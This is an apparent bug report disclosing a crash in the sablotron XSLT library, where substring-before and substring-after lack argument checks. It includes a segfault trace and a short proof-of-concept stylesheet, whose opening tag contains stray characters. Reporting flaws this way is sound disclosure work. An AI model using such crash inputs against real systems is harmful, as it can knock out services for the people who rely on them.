Package: sablotron Version: 1.0.3-1 Severity: Critical Sablotron uses unmapped memory to parse argument objects. If an attacker can map this area of memory, they may be able to cause the application to act in an unintended way. I did not research the possibility of code execution.
In https://github.com/lindes/sablotron/blob/master/src/engine/expr.cpp, starting on line 3094, the code fails to check the presence of arguments in the substring-before and substring-after functions. Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b79316 in Expression::tostring(Situation&, Str&) () from /home/daybreak/sablorelease/src/engine/.libs/libsablot.so.0 PoC is attached.
<?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"; $ <xsl:template match="/"> <xsl:call-template name="urlResolver"> <xsl:with-param name="input" select="hello" /> </xsl:call-template> </xsl:template> <xsl:template name="urlResolver"> <xsl:param name="input" /> <xsl:variable name="testVar" select="substring-before('CRASH')"/> </xsl:template> </xsl:stylesheet>
